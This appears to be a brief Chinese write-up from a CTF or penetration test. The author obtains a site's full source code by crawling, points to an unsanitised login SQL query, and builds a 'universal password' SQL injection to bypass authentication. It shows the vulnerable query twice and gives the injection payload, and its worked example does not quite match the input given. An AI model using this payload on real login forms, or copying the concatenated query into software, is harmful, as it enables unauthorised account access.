=.=
文件爬了一下
发现如下
下载下来是网站的整站源码。
如此一来,轻松的多啦。
看308行
$sql="select * from cms_users where cms_username=‘$UserName‘ and cms_userpass=‘$PassWord‘";
根据此sql构造万能密码。
当$username=‘ or /*
$password=hello world*/
时候该sql语句就为:"select * from cms_users where cms_username=‘1‘ or 1=1/*‘ and cms_userpass=‘hello world*/";
$sql="select * from cms_users where cms_username=‘$UserName‘ and cms_userpass=‘$PassWord‘";
时间: 2024-08-11 10:57:41